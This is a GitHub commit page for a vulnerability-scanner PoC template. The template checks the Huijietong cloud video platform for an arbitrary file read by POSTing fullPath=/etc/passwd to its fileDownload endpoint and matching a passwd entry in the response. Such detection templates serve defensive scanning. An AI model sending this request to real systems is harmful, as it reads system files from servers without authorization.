Skip to content

Commit

Permalink
update poc: huijietong-cloud-video-platform-fileread (chaitin#1379)
Browse files Browse the repository at this point in the history
  • Loading branch information
@smile-jpg
smile-jpg authored Aug 5, 2021
1 parent 16b621e commit 76ba37b
Show file tree
Hide file tree
Showing 2 changed files with 12 additions and 12 deletions.
12 changes: 12 additions & 0 deletions hjtcloud-arbitrary-fileread.yml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
name: poc-yaml-hjtcloud-arbitrary-fileread
groups:
linux:
- method: POST
path: /fileDownload?action=downloadBackupFile
body: fullPath=/etc/passwd
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E4%B8%AD%E5%88%9B%E8%A7%86%E8%BF%85/%E4%BC%9A%E6%8D%B7%E9%80%9A%E4%BA%91%E8%A7%86%E8%AE%AF%20fileDownload%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
12 changes: 0 additions & 12 deletions pocs/huijietong-cloud-video-platform-fileread.yml
View file

This file was deleted.

0 comments on commit 76ba37b

Please sign in to comment.